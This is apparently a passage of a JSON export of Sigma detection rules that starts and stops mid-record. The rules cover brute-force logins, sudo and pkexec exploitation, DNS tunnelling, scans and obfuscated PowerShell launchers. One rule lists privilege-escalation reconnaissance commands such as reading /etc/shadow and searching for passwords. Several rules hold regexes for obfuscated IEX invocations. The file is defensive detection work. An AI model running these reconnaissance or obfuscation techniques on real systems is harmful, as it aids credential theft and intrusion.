    "content": "title: Sign-in Failure Bad Password Threshold\nid: dff74231-dbed-42ab-ba49-83289be2ac3a\nstatus: unsupported\ndescription: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022/04/21\nmodified: 2023/03/24\ntags:\n    - attack.credential_access\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50126\n        ResultDescription: Invalid username or password or Invalid on-premises username or password.\n    filter_computer:\n        TargetUserName|endswith: '$'\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Failed Azure AD Connect Synchronization\n    - Service account use with an incorrect password specified\n    - Misconfigured systems\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml",
    "content": "title: CVE-2021-3156 Exploitation Attempt\nid: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f\nstatus: unsupported\ndescription: |\n  Detects exploitation attempt of vulnerability described in CVE-2021-3156.\n  Alternative approach might be to look for flooding of auditd logs due to bruteforcing\n  required to trigger the heap-based buffer overflow.\nreferences:\n    - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nauthor: Bhabesh Raj\ndate: 2021/02/01\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\n    - cve.2021.3156\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd_base:\n        type: 'EXECVE'\n        a0: '/usr/bin/sudoedit'\n    cmd_s:\n        - a1: '-s'\n        - a2: '-s'\n        - a3: '-s'\n        - a4: '-s'\n    cmd_backslash:\n        - a1: '\\'\n        - a2: '\\'\n        - a3: '\\'\n        - a4: '\\'\n    condition: all of cmd_* | count() by host > 50\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml",
    "content": "title: CVE-2021-3156 Exploitation Attempt Bruteforcing\nid: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2\nrelated:\n    - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f\n      type: derived\nstatus: unsupported\ndescription: |\n  Detects exploitation attempt of vulnerability described in CVE-2021-3156.\n  Alternative approach might be to look for flooding of auditd logs due to bruteforcing\n  required to trigger the heap-based buffer overflow.\nreferences:\n    - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nauthor: Bhabesh Raj\ndate: 2021/02/01\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\n    - cve.2021.3156\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe: '/usr/bin/sudoedit'\n    condition: selection | count() by host > 50\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_4034.yml",
    "content": "title: Potential CVE-2021-4034 Exploitation Attempt\nid: 40a016ab-4f48-4eee-adde-bbf612695c53\nstatus: unsupported\ndescription: Detects exploitation attempt of the vulnerability described in CVE-2021-4034.\nreferences:\n    - https://github.com/berdav/CVE-2021-4034\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034\n    - https://access.redhat.com/security/cve/CVE-2021-4034\nauthor: Pawel Mazur\ndate: 2022/01/27\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_proctitle:\n        type: PROCTITLE\n        proctitle: '(null)'\n    selection_syscall:\n        type: SYSCALL\n        comm: pkexec\n        exe: '/usr/bin/pkexec'\n    condition: selection_proctitle |near selection_syscall\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_debugfs_usage.yml",
    "content": "title: Use of Debugfs to Access a Raw Disk\nid: fb0647d7-371a-4553-8e20-33bbbe122956\nstatus: unsupported\ndescription: Detects access to a raw disk on a host to evade detection by security products.\nreferences:\n    - https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA\n    - https://github.com/Neo23x0/auditd/blob/master/audit.rules # required auditd config\nauthor: Janantha Marasinghe\ndate: 2022/12/20\nmodified: 2023/03/24\ntags:\n    - attack.defense_evasion\n    - attack.t1006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_debugfs:\n        type: 'EXECVE'\n        a0: 'debugfs'\n    selection_tools:\n        type: 'EXECVE'\n        a0:\n            - 'df'\n            - 'lsblk'\n            - 'pvs'\n            - 'fdisk'\n            - 'blkid'\n            - 'parted'\n            - 'hwinfo'\n            - 'inxi'\n    timeframe: 5m\n    condition: selection_debugfs | near selection_tools # requires both\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_omigod_scx_runasprovider_executescript.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteScript\nid: 865c10a6-9541-4d11-9f45-9a3484e23b0a\ndescription: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with a scx* prefix. It is then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file has the same scx* prefix. SCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\nstatus: experimental\ndate: 2021/09/18\nmodified: 2021/11/11\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ntags:\n    - attack.privilege_escalation\n    - attack.initial_access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/\n    - https://github.com/Azure/Azure-Sentinel/pull/3071/files\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        syscall: 'execve'\n        uid: '0'\n        cwd: '/var/opt/microsoft/scx/tmp'\n        cmdline|contains: /etc/opt/microsoft/scx/conf/tmpdir/scx\n        comm: 'sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider ExecuteScript.\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auth_susp_failed_logons_single_source.yml",
    "content": "title: Failed Logins with Different Accounts from Single Source - Linux\nid: fc947f8e-ea81-4b14-9a7b-13f888f94e18\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/02/16\nmodified: 2023/03/24\ntags:\n    - attack.credential_access\n    - attack.t1110\nlogsource:\n    product: linux\n    service: auth\ndetection:\n    selection:\n        pam_message: authentication failure\n        pam_user: '*'\n        pam_rhost: '*'\n    timeframe: 24h\n    condition: selection | count(pam_user) by pam_rhost > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/linux/lnx_shell_priv_esc_prep.yml",
    "content": "title: Privilege Escalation Preparation\nid: 444ade84-c362-4260-b1f3-e45e20e1a905\nstatus: unsupported\ndescription: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.\nreferences:\n    - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/\n    - https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/\n    - https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml\nauthor: Patrick Bareiss\ndate: 2019/04/05\nmodified: 2023/03/24\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # distribution type and kernel version\n        - 'cat /etc/issue'\n        - 'cat /etc/*-release'\n        - 'cat /proc/version'\n        - 'uname -a'\n        - 'uname -mrs'\n        - 'rpm -q kernel'\n        - 'dmesg | grep Linux'\n        - 'ls /boot | grep vmlinuz-'\n        # environment variables\n        - 'cat /etc/profile'\n        - 'cat /etc/bashrc'\n        - 'cat ~/.bash_profile'\n        - 'cat ~/.bashrc'\n        - 'cat ~/.bash_logout'\n        # applications and services as root\n        - 'ps -aux | grep root'\n        - 'ps -ef | grep root'\n        # scheduled tasks\n        - 'crontab -l'\n        - 'cat /etc/cron*'\n        - 'cat /etc/cron.allow'\n        - 'cat /etc/cron.deny'\n        - 'cat /etc/crontab'\n        # search for plain text user/passwords\n        - 'grep -i user *'\n        - 'grep -i pass *'\n        # networking\n        - 'ifconfig'\n        - 'cat /etc/network/interfaces'\n        - 'cat /etc/sysconfig/network'\n        - 'cat /etc/resolv.conf'\n        - 'cat /etc/networks'\n        - 'iptables -L'\n        - 'ip6tables -L'\n        - 'lsof -i'\n        - 'netstat -antup'\n        - 'netstat -antpx'\n        - 'netstat -tulpn'\n        - 'arp -e'\n        - 'route'\n        # sensitive 
files\n        - 'cat /etc/passwd'\n        - 'cat /etc/group'\n        - 'cat /etc/shadow'\n        # sticky bits\n        - 'find / -perm -u=s'\n        - 'find / -perm -g=s'\n        - 'find / -perm -4000'\n        - 'find / -perm -2000'\n        # world writable files\n        - 'find / -perm -o+w'\n    timeframe: 30m\n    condition: keywords | count() by host > 6\nfalsepositives:\n    - Troubleshooting on Linux Machines\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_c2_detection.yml",
    "content": "title: Possible DNS Tunneling\nid: 1ec4b281-aa65-46a2-bdae-5fd830ed914e\nstatus: unsupported\ndescription: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.\nreferences:\n    - https://zeltser.com/c2-dns-tunneling/\n    - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/\nauthor: Patrick Bareiss\ndate: 2019/04/07\nmodified: 2023/03/24\ntags:\n    - attack.command_and_control\n    - attack.t1071.004\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: dns\ndetection:\n    selection:\n        parent_domain: '*'\n    condition: selection | count(dns_query) by parent_domain > 1000\nfalsepositives:\n    - Valid software, which uses dns for transferring data\nlevel: high\n"
  },
  {
    "path": "unsupported/network/net_dns_high_bytes_out.yml",
    "content": "title: High DNS Bytes Out\nid: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd\nstatus: unsupported\ndescription: High number of DNS query bytes sent from a host in a short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: '*'\n    timeframe: 1m\n    condition: selection | sum(question_length) by src_ip > 300000\nfalsepositives:\n    - Legitimate high DNS bytes out rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_null_records_requests_rate.yml",
    "content": "title: High NULL Records Requests Rate\nid: 44ae5117-9c44-40cf-9c7c-7edad385ca70\nstatus: unsupported\ndescription: Extremely high rate of NULL record type DNS requests from a host in a short period of time. Possible result of iodine tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'NULL'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 50\nfalsepositives:\n    - Legitimate high DNS NULL requests rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_requests_rate.yml",
    "content": "title: High DNS Requests Rate\nid: b4163085-4001-46a3-a79a-55d8bbbc7a3a\nstatus: unsupported\ndescription: High number of DNS requests from a host in a short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: '*'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 1000\nfalsepositives:\n    - Legitimate high DNS requests rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_subdomain_rate.yml",
    "content": "title: High DNS subdomain requests rate per domain\nid: 8198e9a8-e38f-4ba5-8f16-882b1c0f880e\ndescription: High rate of unique Fully Qualified Domain Name (FQDN) requests per root domain (eTLD+1) in a short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2019/11/04\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: dns\ndetection:\n    dns_question_name:\n        query: \"*\"\n    default_list_of_well_known_domains:\n        query_etld_plus_one:\n            - \"akadns.net\"\n            - \"akamaiedge.net\"\n            - \"amazonaws.com\"\n            - \"apple.com\"\n            - \"apple-dns.net\"\n            - \"cloudfront.net\"\n            - \"icloud.com\"\n            - \"in-addr.arpa\"\n            - \"google.com\"\n            - \"yahoo.com\"\n            - \"dropbox.com\"\n            - \"windowsupdate.com\"\n            - \"microsoftonline.com\"\n            - \"s-microsoft.com\"\n            - \"office365.com\"\n            - \"linkedin.com\"\n    timeframe: 15m\n    condition: count(subdomain) per query_etld_plus_one per computer_name > 200 and not default_list_of_well_known_domains\n    #    for each host in timeframe\n    #                for each dns_question_etld_plus_one\n    #                    if number of dns_question_name > 200\n    #                        dns_question_etld_plus_one is not in default_list_of_well_known_domains\nfalsepositives:\n    - Legitimate domain name requested, which should be added to a whitelist\nlevel: high\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/network/net_dns_high_txt_records_requests_rate.yml",
    "content": "title: High TXT Records Requests Rate\nid: f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35\nstatus: unsupported\ndescription: Extremely high rate of TXT record type DNS requests from a host in a short period of time. Possible result of Do-exfiltration tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'TXT'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 50\nfalsepositives:\n    - Legitimate high DNS TXT requests rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_large_domain_name.yml",
    "content": "title: Large domain name request\nid: 14aa0d9e-c70a-4a49-bdc1-e5cbc4fc6af7\ndescription: Detects large DNS domain names\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2019/11/04\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query_length: \"> 70\"              # IS MORE THAN 70 bytes\n    default_list_of_well_known_domains:\n        query_etld_plus_one:\n            - \"akadns.net\"\n            - \"akamaiedge.net\"\n            - \"amazonaws.com\"\n            - \"apple.com\"\n            - \"apple-dns.net\"\n            - \"cloudfront.net\"\n            - \"icloud.com\"\n            - \"in-addr.arpa\"\n            - \"google.com\"\n            - \"yahoo.com\"\n            - \"dropbox.com\"\n            - \"windowsupdate.com\"\n            - \"microsoftonline.com\"\n            - \"s-microsoft.com\"\n            - \"office365.com\"\n            - \"linkedin.com\"\n    condition: selection and not default_list_of_well_known_domains\nfalsepositives:\n    - Legitimate domain name requested, which should be added to whitelist\nlevel: high\nstatus: unsupported"
  },
  {
    "path": "unsupported/network/net_firewall_high_dns_bytes_out.yml",
    "content": "title: High DNS Bytes Out - Firewall\nid: 3b6e327d-8649-4102-993f-d25786481589\nstatus: unsupported\ndescription: High number of DNS query bytes sent from a host in a short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port: 53\n    timeframe: 1m\n    condition: selection | sum(message_size) by src_ip > 300000\nfalsepositives:\n    - Legitimate high DNS bytes out rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_high_dns_requests_rate.yml",
    "content": "title: High DNS Requests Rate - Firewall\nid: 51186749-7415-46be-90e5-6914865c825a\nstatus: unsupported\ndescription: High number of DNS requests from a host in a short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port: 53\n    timeframe: 1m\n    condition: selection | count() by src_ip > 1000\nfalsepositives:\n    - Legitimate high DNS requests rate to a domain name, which should be added to a whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_susp_network_scan_by_ip.yml",
    "content": "title: Network Scans Count By Destination IP\nid: 4601eaec-6b45-4052-ad32-2d96d26ce0d8\nstatus: unsupported\ndescription: Detects many failed connection attempts to different ports or hosts\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        action: denied\n    timeframe: 24h\n    condition: selection | count(dst_ip) by src_ip > 10\nfields:\n    - src_ip\n    - dst_ip\n    - dst_port\nfalsepositives:\n    - Inventory systems\n    - Vulnerability scans\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_susp_network_scan_by_port.yml",
    "content": "title: Network Scans Count By Destination Port\nid: fab0ddf0-b8a9-4d70-91ce-a20547209afb\nstatus: unsupported\ndescription: Detects many failed connection attempts to different ports or hosts\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        action: denied\n    timeframe: 24h\n    condition: selection | count(dst_port) by src_ip > 10\nfields:\n    - src_ip\n    - dst_ip\n    - dst_port\nfalsepositives:\n    - Inventory systems\n    - Vulnerability scans\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_possible_dns_rebinding.yml",
    "content": "title: Possible DNS Rebinding\nid: ec5b8711-b550-4879-9660-568aaae2c3ea\nstatus: unsupported\ndescription: 'Detects DNS-answer with TTL <10.'\ndate: 2019/10/25\nauthor: Ilyas Ochkov, oscd.community\nreferences:\n    - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325\ntags:\n    - attack.command_and_control\n    - attack.t1043\nlogsource:\n    product: dns\ndetection:\n    selection:\n        answer: '*'\n    filter1:\n        ttl: '>0'\n    filter2:\n        ttl: '<10'\n    timeframe: 30s\n    condition: selection and filter1 and filter2 | count(answer) by src_ip > 3\nlevel: medium\n"
  },
  {
    "path": "unsupported/other/modsec_mulitple_blocks.yml",
    "content": "title: Multiple Modsecurity Blocks\nid: a06eea10-d932-4aa6-8ba9-186df72c8d23\nstatus: unsupported\ndescription: Detects multiple blocks by the mod_security module (Web Application Firewall)\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/02/28\nmodified: 2023/03/24\ntags:\n    - attack.impact\n    - attack.t1499\nlogsource:\n    product: modsecurity\ndetection:\n    selection:\n        - 'mod_security: Access denied'\n        - 'ModSecurity: Access denied'\n        - 'mod_security-message: Access denied'\n    timeframe: 120m\n    condition: selection | count() > 6\nfalsepositives:\n    - Vulnerability scanners\n    - Frequent attacks if system faces Internet\nlevel: medium\n"
  },
  {
    "path": "unsupported/web/web_multiple_susp_resp_codes_single_source.yml",
    "content": "title: Multiple Suspicious Resp Codes Caused by Single Client\nid: 6fdfc796-06b3-46e8-af08-58f3505318af\nstatus: unsupported\ndescription: Detects possible exploitation activity or bugs in a web application\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.initial_access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        sc-status:\n            - 400\n            - 401\n            - 403\n            - 500\n    timeframe: 10m\n    condition: selection | count() by clientip > 10\nfields:\n    - client_ip\n    - vhost\n    - url\n    - response\nfalsepositives:\n    - Unstable application\n    - Application that misuses the response codes\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/dns_query_win_possible_dns_rebinding.yml",
    "content": "title: Possible DNS Rebinding\nid: eb07e747-2552-44cd-af36-b659ae0958e4\nstatus: unsupported\ndescription: Detects several different DNS answers for one domain with IPs from both internal and external networks. Normally a DNS answer contains a TTL >100 (the DNS record is kept in the host cache for the duration of the TTL).\nreferences:\n    - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019/10/25\nmodified: 2023/02/24\ntags:\n    - attack.initial_access\n    - attack.t1189\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    dns_answer:\n        QueryName: '*'\n        QueryStatus: '0'\n    filter_int_ip:\n        QueryResults|startswith:\n            - '(::ffff:)?10.'\n            - '(::ffff:)?192.168.'\n            - '(::ffff:)?172.16.'\n            - '(::ffff:)?172.17.'\n            - '(::ffff:)?172.18.'\n            - '(::ffff:)?172.19.'\n            - '(::ffff:)?172.20.'\n            - '(::ffff:)?172.21.'\n            - '(::ffff:)?172.22.'\n            - '(::ffff:)?172.23.'\n            - '(::ffff:)?172.24.'\n            - '(::ffff:)?172.25.'\n            - '(::ffff:)?172.26.'\n            - '(::ffff:)?172.27.'\n            - '(::ffff:)?172.28.'\n            - '(::ffff:)?172.29.'\n            - '(::ffff:)?172.30.'\n            - '(::ffff:)?172.31.'\n            - '(::ffff:)?127.'\n    timeframe: 30s\n    condition: (dns_answer and filter_int_ip) and (dns_answer and not filter_int_ip) | count(QueryName) by ComputerName > 3\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_clip+_services.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher\nid: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3\nrelated:\n    - id: f7385ee2-0e0c-11eb-adc1-0242ac120002\n      type: derived\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/13\nmodified: 2021/09/16\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 26)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\\\"\\{\\d\\}.+\\-f.+\\\"'\n    condition: selection \nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_obfuscated_iex_services.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation\nid: e75c48bd-3434-4d61-94b7-ddfaa2c08487\nrelated:\n    - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\n      type: derived\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nstatus: unsupported\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019/11/08\nmodified: 2022/07/07\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - ImagePath|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ImagePath|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ImagePath|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ImagePath|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ImagePath|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ImagePath|re: '\\$VerbosePreference\\.ToString\\('\n        - ImagePath|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_stdin+_services.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher\nid: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e\nrelated:\n    - id: 72862bf2-0eb1-11eb-adc1-0242ac120002\n      type: derived\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/15\nmodified: 2021/09/17\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 25)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n    condition: selection \nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_var+_services.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher\nid: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc\nrelated:\n    - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75\n      type: derived\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/15\nmodified: 2021/09/17\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 24)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_compress_services.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION\nid: c70731dd-0097-40ff-b112-f7032f29c16c\nrelated:\n    - id: 175997c5-803c-4b08-8bb0-70b099f47595\n      type: derived  \ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2023/03/04\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 19)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all: \n            - 'new-object'\n            - 'text.encoding]::ascii'\n        ImagePath|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        ImagePath|endswith: 'readtoend'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_rundll_services.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER\nid: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c\nrelated:\n    - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\n      type: derived\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_stdin_services.yml",
